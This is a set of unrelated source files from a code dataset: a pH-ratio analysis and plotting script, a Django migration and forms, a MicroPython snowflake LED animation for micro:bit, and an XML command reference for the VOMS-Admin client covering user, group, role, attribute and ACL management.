D1stdList[i] = np.std(D1file[:,i])
D2stdList[i] = np.std(D2file[:,i])
#Loop to take mean of background data
for k in range(bkgCols):
D1bkg[k] = np.mean(bkg1[:,k], dtype=np.float64)
D2bkg[k] = np.mean(bkg2[:,k], dtype=np.float64)
#I need to take the mean of the first 10 values, then the next 5, then the next 10 and so on, so I must reshape the array
#by first making them arrays and then spliting them up into fives where the first 2 sets of 5 are intensity data, and
#every third set of five values is the corresponding background
D1bkg = np.array(D1bkg)
D1meanbkg = np.mean(D1bkg.reshape(-1,5), axis=1)
D2bkg = np.array(D2bkg)
D2meanbkg = np.mean(D2bkg.reshape(-1,5), axis=1)
D1meanList = np.array(D1meanList)
D1mean = np.mean(D1meanList.reshape(-1,10), axis=1)
D2meanList = np.array(D2meanList)
D2mean = np.mean(D2meanList.reshape(-1,10), axis=1)
D1stdList = np.array(D1stdList)
D1std = np.mean(D1stdList.reshape(-1,10), axis=1)
D2stdList = np.array(D2stdList)
D2std = np.mean(D2stdList.reshape(-1,10), axis=1)
#Correct intensity data for the background and add the std devs in quadriture
CorD1 = D1mean-D1meanbkg
CorD2 = D2mean-D2meanbkg
D1sqr = np.power(D1std,2)
D2sqr = np.power(D2std,2)
DstdAdd = np.sqrt(D1sqr+D2sqr)
#More matrices
DstdRat = [None] * cNum
ratio = [None] * cNum
topE = [None] * cNum
botE = [None] * cNum
#Loop to find the ratio and its errorbars above and below based on the number of iterations or solute concentrations (Cnum)
for j in range(cNum):
ratio[j] = (CorD1[j]-CorD2[j]) / (CorD1[j]+CorD2[j])
topE[j] = np.power((DstdAdd[j] / (CorD1[j]+CorD2[j])),2)
botE[j] = np.power((DstdAdd[j] / (CorD1[j]-CorD2[j])),2)
DstdRat[j] = np.sqrt(topE[j] + botE[j])*abs(ratio[j])
print('\n')
print('Ratios\n')
print(ratio)
print('\n')
print('Standard Deviations\n')
print(DstdRat)
print('\n')
#
R = len(ratio)
pHresults = [None] * R
devR = [None] * R
devL = [None] * R
#Loop to use the get_pH script written by Kieran to find the probabilistic pH and save outputs as printable strings
#Errorstate gets rid of inevitable errors which accompany values not supported by the ratio curve found in the calibration
for kk in range(R):
with np.errstate(divide='ignore', invalid='ignore'):
result = get_pH(ratio[kk],DstdRat[kk],plot=False)
pHresults[kk] = result[0]
devL[kk] = result[1]
devR[kk] = result[2]
#These are to be changed each time new data is taken and used to reflect the concentrations and spot check values
concList = [0.00001,0.001,0.01,0.03,0.1,0.3,1,3,5,7,10,30,100,200,0.00001,0.001,0.03,0.1,0.3,1,3,5,7.5,10,15,30,100,200] #29 concentrations
#concPlot = [0.001,0.3,30]
#repResults = [results[15],results[15],results[15]]
print('\n')
print('pHs\n')
print(pHresults)
print('\n')
print('Lower pH std. deviations\n')
print(devL)
print('\n')
print('Upper pH std. deviations\n')
print(devR)
print('\n')
print('Concentrations\n')
print(concList)
print('\n')
#Set up for plotting as subplots so I can add things on top if I do spot checks later.
f, fig = plt.subplots()
plt.xscale('log')
f2, fig2 = plt.subplots()
plt.xscale('log')
#If statement for the repeating of old points to check accuracy
Repeat=False
if Repeat==True:
fig.errorbar(concPlot,ratio[14:cNum],DstdRat[14:cNum], fmt='ro', linewidth=1.5)
fig2.errorbar(concPlot,repResults,yerr=[devL[14:cNum], devR[14:cNum]], fmt='ro', linewidth=1.5)
#xScale is changed every time new data is taken. Could add to GUI at some point?
fig.errorbar(concList[0:14],ratio[0:14],DstdRat[0:14], fmt='bo', linewidth=1.5, label='Repeated Series')
fig.errorbar(concList[14:cNum],ratio[14:cNum],DstdRat[14:cNum], fmt='r^', linewidth=1.5, label='Original Series')
fig.set_xlim([0.000001,1000])
fig.set_xlabel('Concentration (%)', fontsize=15)
fig.set_ylabel('Ratio', fontsize=15)
fig.set_title(titl1, fontsize=18)
plt.grid()
#
fig2.errorbar(concList[0:14],pHresults[0:14],yerr=[devL[0:14], devR[0:14]], fmt='k^', linewidth=1.5, label='Repeated Series')
fig2.errorbar(concList[14:cNum],pHresults[14:cNum],yerr=[devL[14:cNum], devR[14:cNum]], fmt='r^', linewidth=1.5, label='Original Series')
fig2.set_xlabel('Concentration (%)', fontsize=15)
fig2.set_ylabel('pH', fontsize=15)
fig2.set_xlim([0.000001,1000])
fig2.set_title(titl2, fontsize=18)
#plt.grid()
#
#if legd != '': fig.legend(numpoints=1)
fig.legend(numpoints=1, loc=2)
#fig2.legend(numpoints=1, loc=2)
def plot_Gen(e1,e2,e3,e4,e5,e6,e7,e8,L2,eColor):
#Function to plot general data given a text file of columns
datalist = np.loadtxt(e1)
rowTot = len(datalist[:,0])
#Set up plots
fig, ax0 = plt.subplots()
#Assign each column assuming a certain organization to x, y, and std dev
xCol = datalist[:,e2]
yCol = datalist[:,e3]
stdCol = datalist[:,e4]
#If statements to decide if color should be changed mid way through the columns to signify some change in condition of the data
if eColor != '':
if e4 != '':
ax0.errorbar(xCol[0:eColor],yCol[0:eColor],stdCol[0:eColor],fmt='k^')
ax0.errorbar(xCol[eColor:rowTot],yCol[eColor:rowTot],stdCol[eColor:rowTot],fmt='ko')
else:
ax0.plot(xCol,yCol,'k^')
ax0.plot(xCol,yCol,'ko')
else:
if e4 != '':
stdCol = datalist[:,e4]
ax0.errorbar(xCol,yCol,stdCol,fmt='k^',linewidth=1.5)
else:
ax0.plot(xCol,yCol,'bo')
#
if e5 != '' and L2 == '':
ax0.legend([e5], numpoints=1)
if e5 != '' and L2 != '':
ax0.legend([e5,L2], numpoints=1)
ax0.set_xlabel(e6, fontsize=15)
ax0.set_ylabel(e7, fontsize=15)
ax0.set_title(e8, fontsize=18)
def mean_Gen(meanFile,Leg,xLab,yLab,Titl):
meanData = np.loadtxt(meanFile)
cols = len(meanData[0,:])
rows = len(meanData[:,0])
xscale = range(1,cols+1)
#Matrices!
meanVal = [None] * cols
stdVal = [None] * cols
for i in range(cols):
meanVal[i] = np.mean([meanData[:,i]], dtype=np.float64)
stdVal[i] = np.std([meanData[:,i]])
#Concentration values subject to manual change in the code
concent = [2,1,0.5,0.1]
f, ax1 = plt.subplots()
ax1.errorbar(concent,meanVal,stdVal,fmt='ko',linewidth=1.5)
plt.xscale('log')
ax1.set_xlabel(xLab, fontsize=18)
ax1.set_ylabel(yLab, fontsize=18)
ax1.set_title(Titl, fontsize=15)
ax1.set_xlim(0.05,3)
#throws error if a blank legend is assigned occasionally.
if Leg != '':
ax1.legend([Leg], numpoints=1) | [
"noreply@github.com"
] | TrevorDemille.noreply@github.com |
15779835a64dfa759bd9410bf9661ec5cf78f3aa | 9a1538123b8abec14410dad46c437cf735684dd9 | /product/migrations/0018_productproperty_value_type.py | 48a0a691e24e11ea5cedf4a2158c7c000f223fd6 | [] | no_license | asmuratbek/zastroy24 | deec6bd65229aeb29eb313d915c6c47ca036a8aa | d68ce21beefc644752a1271a4d8981cd2423afba | refs/heads/master | 2020-04-27T18:44:26.845151 | 2019-03-08T18:09:13 | 2019-03-08T18:09:13 | 174,585,168 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 662 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-12-24 09:41
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('product', '0017_auto_20171224_1536'),
]
operations = [
migrations.AddField(
model_name='productproperty',
name='value_type',
field=models.CharField(help_text='\u041d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u043a\u0433', max_length=255, null=True, verbose_name='\u0415\u0434\u0438\u043d\u0438\u0446\u0430 \u0438\u0437\u043c\u0435\u0440\u0435\u043d\u0438\u044f'),
),
]
| [
"asmuratbek@gmail.com"
] | asmuratbek@gmail.com |
40b1899801acd45a1f375f49968cfbaef05ad3e5 | 463761fd2c7901832a2c0e0e9f5c69cdc8367a46 | /snowflake_microbit/mb_snowflake.py | c2db8d7bb46bb401c6dc873d04314bfa96791bc7 | [
"Apache-2.0"
] | permissive | micropython-Chinese-Community/fun | ed8a5eb41f92f6c569f0493e81798a536dfd000f | db63632fbbb345bc8c9198e61f18c286abdac61c | refs/heads/master | 2020-04-10T15:21:46.271844 | 2018-12-11T16:13:35 | 2018-12-11T16:13:35 | 161,106,982 | 5 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,549 | py | from microbit import pin1, sleep, reset
from neopixel import NeoPixel
from random import randint
import gc
pileup=1
TH=2
perc=50
mpt=1
snow = []
pile = [[0]*16,[0]*16,[0]*16,[0]*16,[TH]*16]
np = NeoPixel(pin1, 256)
def rand(n):
return randint(0,n-1)
def set(row, col, color):
if col%2:
np[col*16+15-row] = color
else:
np[col*16+row] = color
def get(row, col):
if col%2:
return np[col*16+15-row]
else:
return np[col*16+row]
def ColorOverlay(row, col, color, add):
c = get(row, col)
if add:
set(row, col, [c[0]+color[0],c[1]+color[1],c[2]+color[2]])
else:
set(row, col, [c[0]-color[0],c[1]-color[1],c[2]-color[2]])
def showimg(dat):
for x in range(9):
for y in range(8):
t=dat[x*8+y]
r=t%16
g=(t>>4)%16
b=(t>>8)%16
np[x*16+15-y*2]=(r,g,b)
r=(t>>12)%16
g=(t>>16)%16
b=(t>>20)%16
np[x*16+14-y*2]=(r,g,b)
def _line():
for i in range(16):
if pile[3][i]<TH:
return
for i in range(16):
ColorOverlay(15,i,[16,0,0],1)
np.show()
sleep(300)
for i in range(16):
ColorOverlay(15,i,[16,0,0],0)
for j in range(3):
for i in range(16):
if pile[3-j][i]>=TH:
ColorOverlay(15-j,i,[8,8,8],0)
pile[3-j][i]=pile[2-j][i]
if pile[3-j][i]>=TH:
ColorOverlay(15-j,i,[8,8,8],1)
for i in range(16):
if pile[0][i]>=TH:
ColorOverlay(12,i,[8,8,8],0)
pile[0]=[0]*16
def _del():
n = len(snow)
if pileup:
for i in range(n):
c = snow[n-1-i]
row = c[0]
col = c[1]
if row<12:
continue
if col == 0:
a = 1
b = pile[row-11][col+1]>=TH
elif col == 15:
a = pile[row-11][col-1]>=TH
b = 1
else:
a = pile[row-11][col-1]>=TH
b = pile[row-11][col+1]>=TH
if pile[row-11][col]>=TH:
ColorOverlay(c[0],c[1],[c[2],c[2],c[2]],0)
if a and b:
if pile[row-12][col]<TH:
pile[row-12][col]+=c[2]
if pile[row-12][col]>=TH:
ColorOverlay(c[0],c[1],[8,8,8],1)
_line()
snow.pop(n-1-i)
else:
for i in range(n):
c = snow[n-1-i]
if c[0] > 14:
ColorOverlay(c[0],c[1],[c[2],c[2],c[2]],0)
snow.pop(n-1-i)
def _new():
if rand(100)<=perc:
for i in range(mpt):
snow.append([-1, rand(16), rand(15)+1])
def _fall():
for i in range(len(snow)):
c=snow[i]
if c[0]>-1:
ColorOverlay(c[0],c[1],[c[2],c[2],c[2]],0)
c[0] += 1
c[1] += 1-rand(3)
c[1]=max(0, min(c[1], 15))
ColorOverlay(c[0],c[1],[c[2],c[2],c[2]],1)
def snowflake():
while True:
if len(snow)>0:
_fall()
np.show()
_del()
_new()
sleep(50)
gc.collect()
npd=[
0x000000, 0x060000, 0x000000, 0x000000,
0x000000, 0x000000, 0x000000, 0x000000,
0x000000, 0x000000, 0x000000, 0x000000,
0x0A0000, 0x060000, 0x000060, 0x000000,
0x000000, 0x060000, 0x060060, 0x0A00A0,
0x0F0000, 0x000000, 0x000000, 0x000000,
0x000000, 0x000000, 0x0F0000, 0x0A00F0,
0x0A00A0, 0x060060, 0x000060, 0x000000,
0x024024, 0x060024, 0x060060, 0x0A00A0,
0x0F00A0, 0x0F00F0, 0x000000, 0x000000,
0x000000, 0x000000, 0x0F0000, 0x0A00F0,
0x0A00A0, 0x060060, 0x000060, 0x000000,
0x000000, 0x060000, 0x060060, 0x0A00A0,
0x0F0000, 0x000000, 0x000000, 0x000000,
0x000000, 0x000000, 0x000000, 0x000000,
0x0A0000, 0x060000, 0x000060, 0x000000,
0x000000, 0x060000, 0x000000, 0x000000,
0x000000, 0x000000, 0x000000, 0x000000,
]
showimg(npd)
del npd
del showimg
gc.collect()
try:
snowflake()
except:
reset() | [
"shaoziyang@126.com"
] | shaoziyang@126.com |
bea6050990dc01a93c86eef796bdd5a4f042ad4f | dccbf522ddbaf9025a41a7375679a7188bcb9ab0 | /category/forms.py | 69aeec12910453b17723e5f8c0a4974c3b203487 | [] | no_license | junghwan1224/django_study | a2cd748fd0a60ac83b13778da31e8208b276bd0a | 67c1f7181b2353882d1e2576cd5ffb116dec36fb | refs/heads/master | 2020-04-21T11:31:30.222650 | 2019-03-01T06:41:44 | 2019-03-01T06:41:44 | 169,528,513 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 492 | py | from django import forms
from django_summernote.widgets import SummernoteWidget
from .models import Post
from .models import Comment
class PostForm(forms.ModelForm):
content = forms.CharField(widget=SummernoteWidget(), label='')
class Meta:
model = Post
exclude = ('author', 'post_status', 'created_at', 'updated_at', 'apply_user',)
class CommentForm(forms.ModelForm):
class Meta:
model = Comment
exclude = ('author', 'created_at', 'post',)
| [
"aorwn212@naver.com"
] | aorwn212@naver.com |
5abc08ddf1f3216fa1ab6d4e58da02ac53e7e1df | ffd7b823905e1db0462e39017414dbef8bdf8c21 | /src/VOMSAdmin/VOMSCommandsDef.py | b33b66a3a619e4befd8150f043302b8e34a983db | [
"Apache-2.0"
] | permissive | AlbertoPeon/voms-admin-client | 3dd7cd2d71b3c5591dbd96ccca950d460071320d | e628a8e09acc19a106d325154706f300d7651a42 | refs/heads/master | 2021-01-15T17:21:24.956019 | 2012-04-14T08:17:42 | 2012-04-14T08:17:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 28,610 | py | #
# Copyright (c) Members of the EGEE Collaboration. 2006-2009.
# See http://www.eu-egee.org/partners/ for details on the copyright holders.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# Andrea Ceccanti (INFN)
#
commands_def="""<?xml version="1.0" encoding="UTF-8"?>
<voms-commands>
<command-group
name="User management commands"
shortname="user">
<command
name="list-users">
<description>list-users</description>
<help-string
xml:space="preserve">
Lists the VO users.</help-string>
</command>
<command
name="list-suspended-users">
<description>list-suspended-users</description>
<help-string
xml:space="preserve">
Lists the VO users that are currently suspended. (Requires VOMS Admin server >= 2.7.0)</help-string>
</command>
<command
name="list-expired-users">
<description>list-expired-users</description>
<help-string
xml:space="preserve">
Lists the VO users that are currently expired. (Requires VOMS Admin server >= 2.7.0)</help-string>
</command>
<command
name="count-expired-users">
<description>count-expired-users</description>
<help-string
xml:space="preserve">
Prints how many VO users are currently expired. (Requires VOMS Admin server >= 2.7.0)</help-string>
</command>
<command
name="count-suspended-users">
<description>count-suspended-users</description>
<help-string
xml:space="preserve">
Counts how many VO users are currently suspended. (Requires VOMS Admin server >= 2.7.0)</help-string>
</command>
<command
name="count-users">
<description>count-users</description>
<help-string
xml:space="preserve">
Counts how many users are in the VO. (Requires VOMS Admin server >= 2.7.0)</help-string>
</command>
<command
name="list-user-stats">
<description>list-user-stats</description>
<help-string
xml:space="preserve">
List users statistics for this VO. (Requires VOMS Admin server >= 2.7.0)</help-string>
</command>
<command
name="create-user">
<description>create-user CERTIFICATE.PEM</description>
<help-string
xml:space="preserve">
Registers a new user in VOMS.
If you use the --nousercert option, then four parameters are
required (DN CA CN MAIL) to create the user.
Otherwise these parameters are extracted automatically from the
certificate.
Examples:
voms-admin --vo test_vo create-user .globus/usercert.pem
voms-admin --nousercert --vo test_vo create-user \
'My DN' 'My CA' 'My CN' 'My Email'</help-string>
<arg
type="X509" />
</command>
<command
name="delete-user">
<description>delete-user USER</description>
<help-string
xml:space="preserve">
Deletes a user from VOMS, including all their attributes
and membership information.
USER is either an X509 certificate file in PEM format,
or a DN, CA couple when the --nousercert option is set.
Examples:
voms-admin --vo test_vo delete-user .globus/usercert.pem
voms-admin --nousercert --vo test_vo delete-user \
'My DN' 'MY CA'</help-string>
<arg
type="User" />
</command>
</command-group>
<command-group
name="Role management commands"
shortname="role">
<command
name="list-roles">
<description>list-roles</description>
<help-string
xml:space="preserve">
Lists the roles defined in the VO.</help-string>
</command>
<command
name="create-role">
<description>create-role ROLENAME</description>
<help-string
xml:space="preserve">
Creates a new role</help-string>
<arg
type="Role" />
</command>
<command
name="delete-role">
<description>delete-role ROLENAME</description>
<help-string
xml:space="preserve">
Deletes a role.</help-string>
<arg
type="Role" />
</command>
</command-group>
<command-group
name="Group management commands"
shortname="group">
<command
name="list-groups">
<description>list-groups</description>
<help-string
xml:space="preserve">
Lists all the groups defined in the VO.</help-string>
</command>
<command
name="list-sub-groups">
<description>list-sub-groups GROUPNAME</description>
<help-string
xml:space="preserve">
List the subgroups of GROUPNAME.</help-string>
<arg
type="Group" />
</command>
<command
name="create-group">
<description>create-group GROUPNAME</description>
<help-string xml:space="preserve">
Creates a new group named GROUPNAME.
Note that the vo root group part of the fully qualified group name
can be omitted, i.e., if the group to be created is called /vo/ciccio,
where /vo is the vo root group, this command accepts both the "ciccio"
and "/vo/ciccio" syntaxes.</help-string>
<arg
type="Group" />
</command>
<command
name="delete-group">
<description>delete-group GROUPNAME</description>
<help-string
xml:space="preserve">
Deletes a group.</help-string>
<arg
type="Group" />
</command>
<command
name="list-user-groups">
<description>list-user-groups USER</description>
<help-string xml:space="preserve">
Lists the groups that USER is a member of. USER is either
an X509 certificate file in PEM format, or a DN, CA couple when the
--nousercert option is set.</help-string>
<arg
type="User" />
</command>
</command-group>
<command-group
name="Group membership management commands"
shortname="membership">
<command
name="add-member">
<description>add-member GROUPNAME USER</description>
<help-string xml:space="preserve">
Adds USER to the GROUPNAME group.
USER is either an X509 certificate file in PEM format,
or a DN, CA couple when the --nousercert option is set.</help-string>
<arg
type="Group" />
<arg
type="User" />
</command>
<command
name="remove-member">
<description>remove-member GROUPNAME USER</description>
<help-string xml:space="preserve">
Removes USER from the GROUPNAME group.
USER is either an X509 certificate file in PEM format,
or a DN, CA couple when the --nousercert option is set.</help-string>
<arg
type="Group" />
<arg
type="User" />
</command>
<command
name="list-members">
<description>list-members GROUPNAME</description>
<help-string
xml:space="preserve">
Lists all members of a group.</help-string>
<arg
type="Group" />
</command>
</command-group>
<command-group
name="Role assignment commands"
shortname="role-assign">
<command
name="assign-role">
<description>assign-role GROUPNAME ROLENAME USER</description>
<help-string xml:space="preserve">
Assigns role ROLENAME to user USER in group GROUPNAME.
USER is either an X509 certificate file in PEM format,
or a DN, CA couple when the --nousercert option is set.</help-string>
<arg
type="Group" />
<arg
type="Role" />
<arg
type="User" />
</command>
<command
name="dismiss-role">
<description>dismiss-role GROUPNAME ROLENAME USER
</description>
<help-string xml:space="preserve">
Dismiss role ROLENAME from user USER in group GROUPNAME.
USER is either an X509 certificate file in PEM format,
or a DN, CA couple when the --nousercert option is set.</help-string>
<arg
type="Group" />
<arg
type="Role" />
<arg
type="User" />
</command>
<command
name="list-users-with-role">
<description>list-users-with-role GROUPNAME ROLENAME
</description>
<help-string xml:space="preserve">
Lists all users with ROLENAME in GROUPNAME.</help-string>
<arg
type="Group" />
<arg
type="Role" />
</command>
<command
name="list-user-roles">
<description>list-user-roles USER</description>
<help-string xml:space="preserve">
Lists the roles that USER is assigned.
USER is either an X509 certificate file in PEM format,
or a DN, CA couple when the --nousercert option is set.</help-string>
<arg
type="User" />
</command>
</command-group>
<command-group
name="Attribute class management commands"
shortname="attr-class">
<command
name="create-attribute-class">
<description> create-attribute-class CLASSNAME DESCRIPTION UNIQUE
</description>
<help-string xml:space="preserve">
Creates a new generic attribute class named CLASSNAME, with
description DESCRIPTION.
UNIQUE is a boolean argument. If UNIQUE is true,
attribute values assigned to users for this class are checked for
uniqueness. Otherwise no checks are performed on user attribute values.
</help-string>
<arg
type="String" />
<arg
type="String"
nillable="true" />
<arg
type="Boolean"
nillable="true" />
</command>
<command
name="delete-attribute-class">
<description>delete-attribute-class CLASSNAME
</description>
<help-string xml:space="preserve">
Removes the generic attribute class CLASSNAME. All the
user, group and role attribute mappings will be deleted as well.
</help-string>
<arg
type="String" />
</command>
<command
name="list-attribute-classes">
<description>list-attribute-classes</description>
<help-string xml:space="preserve">
Lists the attribute classes defined for the VO.</help-string>
</command>
</command-group>
<command-group
name="Generic attribute assignment commands"
shortname="attrs">
<command
name="set-user-attribute">
<description> set-user-attribute USER ATTRIBUTE ATTRIBUTE_VALUE
</description>
<help-string xml:space="preserve">
Sets the generic attribute ATTRIBUTE value to
ATTRIBUTE_VALUE for user USER. USER is either an X509 certificate file
in PEM format, or a DN, CA couple when the --nousercert option is set.
</help-string>
<arg
type="User" />
<arg
type="String" />
<arg
type="String" />
</command>
<command
name="delete-user-attribute">
<description>delete-user-attribute USER ATTRIBUTE
</description>
<help-string xml:space="preserve">
Deletes the generic attribute ATTRIBUTE value from user
USER. USER is either an X509 certificate file in PEM format, or a DN,
CA couple when the --nousercert option is set.</help-string>
<arg
type="User" />
<arg
type="String" />
</command>
<command
name="list-user-attributes">
<description>list-user-attributes USER</description>
<help-string xml:space="preserve">
Lists the generic attributes defined for user USER. USER is
either an X509 certificate file in PEM format, or a DN, CA couple when
the --nousercert option is set.</help-string>
<arg
type="User" />
</command>
<command
name="set-group-attribute">
<description> set-group-attribute GROUP ATTRIBUTE ATTRIBUTE_VALUE
</description>
<help-string xml:space="preserve">
Sets the generic attribute ATTRIBUTE value to
ATTRIBUTE_VALUE for group GROUP.</help-string>
<arg
type="Group" />
<arg
type="String" />
<arg
type="String" />
</command>
<command
name="set-role-attribute">
<description> set-role-attribute GROUP ROLE ATTRIBUTE ATTRIBUTE_VALUE
</description>
<help-string xml:space="preserve">
Sets the generic attribute ATTRIBUTE value to
ATTRIBUTE_VALUE for role ROLE in group GROUP.</help-string>
<arg
type="Group" />
<arg
type="Role" />
<arg
type="String" />
<arg
type="String" />
</command>
<command
name="delete-group-attribute">
<description>delete-group-attribute GROUP ATTRIBUTE
</description>
<help-string xml:space="preserve">
Deletes the generic attribute ATTRIBUTE value from group
GROUP.</help-string>
<arg
type="Group" />
<arg
type="String" />
</command>
<command
name="list-group-attributes">
<description>list-group-attributes GROUP
</description>
<help-string xml:space="preserve">
Lists the generic attributes defined for group GROUP.</help-string>
<arg
type="Group" />
</command>
<command
name="list-role-attributes">
<description>list-role-attributes GROUP ROLE
</description>
<help-string xml:space="preserve">
Lists the generic attributes defined for role ROLE in group
GROUP.</help-string>
<arg
type="Group" />
<arg
type="Role" />
</command>
<command
name="delete-role-attribute">
<description> delete-role-attribute GROUP ROLE ATTRIBUTE</description>
<help-string xml:space="preserve">
Deletes the generic attribute ATTRIBUTE value from role
ROLE in group GROUP.</help-string>
<arg
type="Group" />
<arg
type="Role" />
<arg
type="String" />
</command>
</command-group>
<command-group
name="ACL management commands"
shortname="acl">
<command
name="get-ACL">
<description>get-ACL CONTEXT</description>
<help-string xml:space="preserve">
Gets the ACL defined for voms context CONTEXT. CONTEXT may
be either a group (e.g. /groupname ) or a qualified role
(e.g./groupname/Role=VO-Admin).</help-string>
<arg
type="String" />
</command>
<command
name="get-default-ACL">
<description>get-default-ACL GROUP</description>
<help-string xml:space="preserve">
Gets the default ACL defined for group GROUP.</help-string>
<arg
type="Group" />
</command>
<command
name="add-ACL-entry">
<description> add-ACL-entry CONTEXT USER PERMISSION PROPAGATE
</description>
<help-string xml:space="preserve">
Adds an entry to the ACL for CONTEXT assigning PERMISSION
to user/admin USER. If PROPAGATE is true, the entry is
propagated to children contexts.
CONTEXT may be either a group (e.g. /groupname ) or
a qualified role (e.g./groupname/Role=VO-Admin).
USER is either an X509 certificate file in PEM format,
or a DN, CA couple when the --nousercert option is set.
PERMISSION is a VOMS permission expressed using the
VOMS-Admin 2.x format. Allowed permission values are:
ALL
CONTAINER_READ CONTAINER_WRITE
MEMBERSHIP_READ MEMBERSHIP_WRITE
ATTRIBUTES_READ ATTRIBUTES_WRITE
ACL_READ ACL_WRITE ACL_DEFAULT
REQUESTS_READ REQUESTS_WRITE
PERSONAL_INFO_READ PERSONAL_INFO_WRITE
SUSPEND
Multiple permissions can be assigned by combining them
in a comma separated list, e.g.:
"CONTAINER_READ,MEMBERSHIP_READ"
Special meaning DN,CA couples (to be used with
the --nousercert option set) are listed hereafter:
If DN is ANYONE and CA is VOMS_CA, an entry will be created
that assigns the specified PERMISSION to to any
authenticated user (i.e., any client that authenticates
with a certificates signed by a trusted CA).
if CA is GROUP_CA, DN is interpreted as a group and entry
will be assigned to members of such group.
if CA is ROLE_CA, DN is interpreted as a qualified role
(i.e., /test_vo/Role=TestRole), the entry will be assigned
to VO members that have the given role in the given group.
Examples:
voms-admin --vo test_vo add-ACL-entry /test_vo \\
.globus/usercert.pem ALL true
(The above command grants full rights to the user identified by
'.globus/usercert.pem' on the whole VO, since PROPAGATE is true)
voms-admin --nousercert --vo test_vo add-ACL-entry /test_vo \\
'ANYONE' 'VOMS_CA' 'CONTAINER_READ,MEMBERSHIP_READ' true
(The above command grants READ rights on VO structure and membership
to any authenticated user on the whole VO, since PROPAGATE is true)
To get more detailed information about Voms admin AuthZ
framework, either consult the voms-admin user's guide
or type:
voms-admin --help-acl</help-string>
<arg
type="String" />
<arg
type="User" />
<arg
type="Permission" />
<arg
type="Boolean" />
</command>
<command
name="add-default-ACL-entry">
<description> add-default-ACL-entry GROUP USER PERMISSION</description>
<help-string xml:space="preserve">
Adds an entry to the default ACL for GROUP assigning
PERMISSION to user/admin USER.
USER is either an X509 certificate file
in PEM format, or a DN, CA couple when the --nousercert option is set.
PERMISSION is a VOMS permission expressed using the VOMS-Admin 2.x
format.
Allowed permission values are:
ALL
CONTAINER_READ CONTAINER_WRITE
MEMBERSHIP_READ MEMBERSHIP_WRITE
ATTRIBUTES_READ ATTRIBUTES_WRITE
ACL_READ ACL_WRITE ACL_DEFAULT
REQUESTS_READ REQUESTS_WRITE
PERSONAL_INFO_READ PERSONAL_INFO_WRITE
SUSPEND
Multiple permissions can be assigned by combining them
in a comma separated list, e.g.:
"CONTAINER_READ,MEMBERSHIP_READ"
Special meaning DN,CA couples are listed hereafter:
If DN is ANYONE and CA is VOMS_CA, an entry will be created that
assigns the specified PERMISSION to to any authenticated user (i.e.,
any client that authenticates with a certificates signed by
a trusted CA).
if CA is GROUP_CA, DN is interpreted as a group and entry will be
assigned to members of such group.
if CA is ROLE_CA, DN is interpreted as a qualified role
(i.e., /test_vo/Role=TestRole), the entry will be assigned to VO
members that have the given role in the given group.
To get more detailed information about Voms admin AuthZ framework,
either consult the voms-admin user's guide or type:
voms-admin --help-acl</help-string>
<arg
type="Group" />
<arg
type="User" />
<arg
type="Permission" />
</command>
<command
name="remove-ACL-entry">
<description>remove-ACL-entry CONTEXT USER PROPAGATE
</description>
<help-string xml:space="preserve">
Removes the entry from the ACL for CONTEXT for user/admin USER.
If PROPAGATE is true, the entry is removed also from children
contexts.
CONTEXT may be either a group (e.g. /groupname ) or a
qualified role (e.g./groupname/Role=VO-Admin).
USER is either an X509 certificate file
in PEM format, or a DN, CA couple when the --nousercert option is set.
Special meaning DN,CA couples are listed hereafter:
If DN is ANYONE and CA is VOMS_CA, an entry will be created that
assigns the specified PERMISSION to to any authenticated user (i.e.,
any client that authenticates with a certificates signed by
a trusted CA).
if CA is GROUP_CA, DN is interpreted as a group and entry will be
assigned to members of such group.
if CA is ROLE_CA, DN is interpreted as a qualified role
(i.e., /test_vo/Role=TestRole), the entry will be assigned to VO
members that have the given role in the given group.
Examples:
voms-admin --nousercert --vo test_vo remove-ACL-entry \\
/test_vo 'ANYONE' 'VOMS_CA' true
(The above command removes any right on the VO from any authenticated
user)
To get more detailed information about Voms admin AuthZ framework,
either consult the voms-admin user's guide or type:
voms-admin --help-acl</help-string>
<arg
type="String" />
<arg
type="User" />
<arg
type="Boolean" />
</command>
<command
name="remove-default-ACL-entry">
<description>remove-default-ACL-entry GROUP USER
</description>
<help-string xml:space="preserve">
Removes the entry for user/admin USER from the default ACL
for GROUP.
USER is either an X509 certificate file in PEM format, or a DN,
CA couple when the --nousercert option is set.
Special meaning DN,CA couples are listed hereafter:
If DN is ANYONE and CA is VOMS_CA, an entry will be created that
assigns the specified PERMISSION to to any authenticated user (i.e.,
any client that authenticates with a certificates signed by
a trusted CA).
if CA is GROUP_CA, DN is interpreted as a group and entry will be
assigned to members of such group.
if CA is ROLE_CA, DN is interpreted as a qualified role
(i.e., /test_vo/Role=TestRole), the entry will be assigned to VO
members that have the given role in the given group.
To get more detailed information about Voms admin AuthZ framework,
either consult the voms-admin user's guide or type:
voms-admin --help-acl</help-string>
<arg
type="Group" />
<arg
type="User" />
</command>
</command-group>
<command-group
name="Other commands"
shortname="other">
<command
name="get-vo-name">
<description>get-vo-name</description>
<help-string xml:space="preserve">
This command returns the name of the contacted vo.</help-string>
</command>
<command
name="list-cas">
<description>list-cas</description>
<help-string xml:space="preserve">
Lists the certificate authorities accepted by the VO.</help-string>
</command>
</command-group>
<command-group
name="Certificate management commands"
shortname="Certificate"
>
<command
name="add-certificate">
<description>add-certificate USER CERT</description>
<help-string xml:space="preserve">
Binds a certificate to an existing VO user.
This operation may take either two pem certficate files as argument, or,
if the --nousercert option is set, two DN CA couples.
Example:
voms-admin --vo infngrid add-certificate my-cert.pem my-other-cert.pem
voms-admin --vo infngrid --nousercert add-certificate \\
'/C=IT/O=INFN/OU=Personal Certificate/L=CNAF/CN=Andrea Ceccanti' '/C=IT/O=INFN/CN=INFN CA' \\
